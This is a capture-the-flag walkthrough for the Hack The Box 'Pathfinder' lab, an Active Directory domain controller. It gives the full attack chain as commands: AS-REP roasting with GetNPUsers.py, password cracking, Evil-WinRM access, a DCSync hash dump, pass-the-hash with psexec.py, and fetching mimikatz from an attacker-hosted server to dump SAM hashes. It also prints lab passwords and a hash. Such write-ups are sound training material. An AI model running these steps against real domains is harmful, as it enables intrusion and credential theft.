# Pathfinder Walkthrough As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be **rooted in sequence**. So it means, if you need to go through this box, first of all you must have a complete [Shield ](https://shapmanasick.gitbook.io/starting-point-htb/shield-walkthrough)machine. Enough talks, πŸ₯± Let’s Get It Started πŸ±β€πŸ’» {% hint style="danger" %} > **Disclaimers:** No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! πŸ±β€πŸ‘€ > {% endhint %} ## 00. Start Machine … To start machine, just click "Join Machine". ![Pathfinder ](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaEUtVo9_WyUvRwmCwd%2F-MaEVeG5FnToZfGM0SkP%2Fimage.png?alt=media\&token=80527a75-c0ba-4fad-b31f-caed1e2e416c) Then you can see the **IP** address for that machine. Usually it is **`10.10.10.30` 🀠** ![10.10.10.30](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaEUtVo9_WyUvRwmCwd%2F-MaEVp2aY2oIGboXm46j%2Fimage.png?alt=media\&token=653c86c8-adfe-4e17-8adf-9f6309e6d777) Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! πŸ™‚ ```sql β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Pathfinder] └─# ping 10.10.10.30 -c 2 PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data. 64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=235 ms 64 bytes from 10.10.10.30: icmp_seq=2 ttl=127 time=237 ms --- 10.10.10.30 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1005ms rtt min/avg/max/mdev = 235.305/236.156/237.007/0.851 ms ``` {% hint style="info" %} As a ping result, It's TTL=127. There is only one route between machine and us (VPN). So definitely it will be a Windows machine. {% endhint %} ## 01. Enumeration First … #### 01.1 Fast ports scan As usual, run Nmap fast scan for all TCP ports to identify the ports which are open. ```cpp nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30 ``` ```cpp -n : Never do DNS resolution -vv : Extra verbosity --open : Output only open ports -p- : Full TCP ports range (65535) -T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network ``` Here is the output πŸ‘‡ ```sql └─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30 Discovered open port 389/tcp on 10.10.10.30 Discovered open port 49676/tcp on 10.10.10.30 SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining) Discovered open port 49714/tcp on 10.10.10.30 Discovered open port 49664/tcp on 10.10.10.30 Discovered open port 49667/tcp on 10.10.10.30 Discovered open port 636/tcp on 10.10.10.30 Discovered open port 88/tcp on 10.10.10.30 Discovered open port 9389/tcp on 10.10.10.30 Discovered open port 49666/tcp on 10.10.10.30 Discovered open port 3268/tcp on 10.10.10.30 Completed SYN Stealth Scan at 11:26, 173.96s elapsed (65535 total ports) Nmap scan report for 10.10.10.30 Host is up, received echo-reply ttl 127 (0.24s latency). Scanned at 2021-05-21 11:23:43 EDT for 175s Not shown: 65466 closed ports, 45 filtered ports Reason: 65466 resets and 45 no-responses Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 53/tcp open domain syn-ack ttl 127 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127 9389/tcp open adws syn-ack ttl 127 47001/tcp open winrm syn-ack ttl 127 49664/tcp open unknown syn-ack ttl 127 49665/tcp open unknown syn-ack ttl 127 49666/tcp open unknown syn-ack ttl 127 49667/tcp open unknown syn-ack ttl 127 49673/tcp open unknown syn-ack ttl 127 49676/tcp open unknown syn-ack ttl 127 49677/tcp open unknown syn-ack ttl 127 49683/tcp open unknown syn-ack ttl 127 49695/tcp open unknown syn-ack ttl 127 49714/tcp open unknown syn-ack ttl 127 Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 174.50 seconds Raw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB) ``` This is why I recommend to scan all the ports. Here you can see there are so many ports open and by looking at the open ports (`ldap,kpasswd5 & kerberos`) we can definitely say that this machine is an Active Directory machine. We haven't touched that area before. Sharp your Active Directory enumeration skills, it will worth if you are willing to try Red Team activities. {% hint style="info" %} Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. \[Copied from [Wikipedia](https://en.wikipedia.org/wiki/Active_Directory)] {% endhint %} #### 01.2 Run Nmap Scripting Engine To get the best result, we can run the `Nmap Scripting Engine` for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible. ```sql β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Pathfinder] └─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:43 EDT Nmap scan report for 10.10.10.30 Host is up (0.23s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49672/tcp closed unknown 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49683/tcp open msrpc Microsoft Windows RPC 49700/tcp closed unknown 49720/tcp closed unknown Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h11m13s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-05-21T22:55:29 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds ``` As it is an Active Directory machine, our enumeration steps will be different. ldap enumeration is pretty cool if you use [BloodHound](https://github.com/BloodHoundAD/BloodHound) because it gives us graphical information. But it's already done in official writeup. So let's begin with my way. 😎😎 #### 01.3 Discover more on domain Nmap tells us the domain (`Domain: MEGACORP`) we are in. And don't forget we had some credentials from [Shield ](https://shapmanasick.gitbook.io/starting-point-htb/oopsie-walkthrough#04-post-exploitation)machine. `sandra:Password1234!` First we can tryout with [`ldapdomaindump` ](https://github.com/dirkjanm/ldapdomaindump)tool. Let's start. ```sql ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep ``` ```cpp -u : DOMAIN\username for authentication, leave empty for anonymous authentication -p : Password or LM:NTLM hash, will prompt if not specified -o : Directory in which the dump will be saved (default: current) --no-json : Disable JSON output --no-grep : Disable Greppable output ``` Here is the output, πŸ‘‡πŸ‘‡ ```sql β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Pathfinder] └─# ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Pathfinder] └─# cd ldapinfo β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Pathfinder/ldapinfo] └─# ls domain_users.html domain_computers_by_os.html domain_computers.html domain_groups.html domain_policy.html domain_trusts.html domain_users_by_group.html ``` As you can see there are a lot of HTML files here. Among them, first I choose `domain_users.html` You can view through it from the browser. But instead of that, I will use [`html2text` ](https://pypi.org/project/html2text/)tool. You can simply install it by typing `sudo apt-get install html2text` . However the result will be like this. πŸ‘‡πŸ‘‡ ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF3QozWJmcpKh919-T%2F-MaF450Y1ipBJDWlXqT5%2Fimage.png?alt=media\&token=85ad8608-abeb-4e41-b865-131bb9c8a249) There are 5 accounts here. `Guest, Administrator` and `krbtgt` accounts are the default accounts. `sandra` and `svc_bes` accounts are user created ones. As you can see, I highlighted the `svc_bes` account because it has enabled the**`DONT_REQ_PREAUTH`** flag. Now I'll simply explain what the kerberos authentication is. If you need to know what `DONT_REQ_PREAUTH` flag means, you must understand the **kerberos authentication** before. ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF3QozWJmcpKh919-T%2F-MaF5pftRxID2hv08kO6%2Fimage.png?alt=media\&token=c0162370-9528-4d00-9132-23921274ab6c) This draft shows you how the normal authentication process. But if `DONT_REQ_PREAUTH` flag is set, **second** and **third** steps of the process can be missed. That means you can directly request the service ticket. Click [here](https://en.wikipedia.org/wiki/Kerberos_\(protocol\)) if you need more information about kerberos authentication. ## 02. Foothold Now we are going to use [impacket's](https://github.com/SecureAuthCorp/impacket) `GetNPUsers.py` script to grab the request service ticket. {% hint style="info" %} If you don't have that script installed on your computer follow below command to install it. ```sql sudo -s cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket sudo python3 -m pip install . sudo python3 setup.py install cd examples/ ``` {% endhint %} Type below commands to grab the request ticket. ```cpp python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john ``` ```cpp -request : Requests TGT for users and output them in JtR/hashcat format (default False) -no-pass : Don't ask for password (useful for Kerberos authentication) -dc-ip : IP Address of the domain controller. -format : Format to save the AS_REQ of users without pre-authentication. Default is hashcat ``` Output will be like this. πŸ‘‡πŸ‘‡ ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFFNxKA3w_1uNkP5pp%2Fimage.png?alt=media\&token=0443b0a3-dc25-4ecc-a1ae-d3b06f220310) We grabbed the ticket. Now it's time to powerup [John the Ripper](https://www.openwall.com/john/) and crack the hash. First of all copy that hash to file then run the john.🀠🀠 ```sql john hash --wordlist=/usr/share/wordlists/rockyou.txt ``` ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFGKeG3-X0fAQFlqxq%2Fimage.png?alt=media\&token=bbbba37e-e184-43d3-bb4f-144676234dd3) We got the password for `svc_bes` !!! * `svc_bes : Sheffield19` ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFH4twxUdvuU656DgE%2Fimage.png?alt=media\&token=04c69c3c-7bc5-476d-aa0d-146abf08f9a1) Now since we have the username and password, we can use [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) tool. You can simply install it by typing `gem install evil-winrm` and hit enter, then the tool will be installed to your machine. 😎😎 Now, don't you have a question ❓ We already have the username and password for user **sandra**. Why didn't we use it? It's because there is nothing inside that account. It's just a simple user account. Let's run the tool for svc\_bes account. ```cpp evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30 ``` ![user.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFHcLpM7vaCNtrd5wF%2F-MaFJjvf6c7xkjfloCKN%2Fimage.png?alt=media\&token=714e81c8-2f7f-41b5-bbf7-4574072fd891) So we got the user flag. Now, time to escalate privileges. ## 03. Privilege Escalation Now we are going to perform [DCSync attack](https://www.qomplx.com/kerberos_dcsync_attacks_explained/) and dump the NTLM hashes of all domain users using the Impacket's [secretsdump.py ](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py)script. 😈😈 Let's try it. ```cpp /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30 ``` Here is the output. πŸ‘‡πŸ‘‡ ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFHcLpM7vaCNtrd5wF%2F-MaFNNHT8ij_UjXd4Vsa%2Fimage.png?alt=media\&token=812cb165-e2ee-4b77-8ad7-9f606011a238) As you can see, We have NTLM hash for the Administrator account. We can use this to perform **Pass The Hash attack** and gain elevated access to the system. Also we can use Impacket's[ psexec.py](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) for this too. See how [impacket](https://github.com/SecureAuthCorp/impacket) helps us during this machine. Give respect to the [SecureAuth Corporation](https://www.secureauth.com/). πŸ™‹β€β™‚οΈπŸ™‹β€β™‚οΈ #### 0**3**.1 Perform Pass The Hash Attack First, copy the above Administrator's hash without triple colon (:::) at the end and then type this. ```cpp /usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes ``` ![root.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFRiIJWzuZi7ycEYi7%2Fimage.png?alt=media\&token=1b6c2824-a723-454d-8eea-994aee0d3a8e) We got the root flag too!!. 🧐🧐 ![root.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFZ_zx9jXgIWi5XmI5%2F-MaFZenwsSSxm4idP_Kx%2Fimage.png?alt=media\&token=98b7648b-1d84-4421-b53c-235e7d2819da) ## 04. Post Exploitation Since these boxes are all connected, we are going to grab the local admin hash too. So let’s upload [mimikatz.](https://github.com/gentilkiwi/mimikatz/wiki) You can download `mimikatz` tool from [here](https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip) and upload it to the box using python demon web server. ```cpp wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip && unzip mimikatz_trunk.zip && cd x64 && python3 -m http.server ``` ```cpp powershell.exe -c "IWR -useBasicParsing http://:8000/mimikatz.exe -o mcat.exe" ``` ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFTCebuAq2p55qALYz%2Fimage.png?alt=media\&token=a9f8f720-d772-4d22-bf52-7f14a3fdb656) Then we can run that file by typing `.\mcat` And then run the `lsadump::sam` command. ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFVUjWTVrs7MfwbN4e%2Fimage.png?alt=media\&token=4b7381e5-b523-4a4a-88d5-dc45afc5c074) Here is the hash : 7facdc498ed1680c4fd1448319a8c04f You can decode it through the [crackstation ](https://crackstation.net/)site. ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFVfK7TEHx4qpr0UnI%2F-MaFX51eTjy22bDTPq1y%2Fimage.png?alt=media\&token=9968dc48-bcc7-4baf-b418-114c36f1ef37) The password is : `Password!` Finally we are done. and from here you must have VIP or VIP+ membership to play with other boxes. Okay... I’ll see you on the next box! πŸ™‹β€β™‚οΈπŸ™‹β€β™‚οΈ ![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFYGcfEGWqroDWh_E5%2F-MaFYJtpWXyxsXv3xc10%2Fimage.png?alt=media\&token=0763dbb9-6089-45de-b213-2139fcad6de3) **Find me on** [@twitter](https://twitter.com/ShapManasick)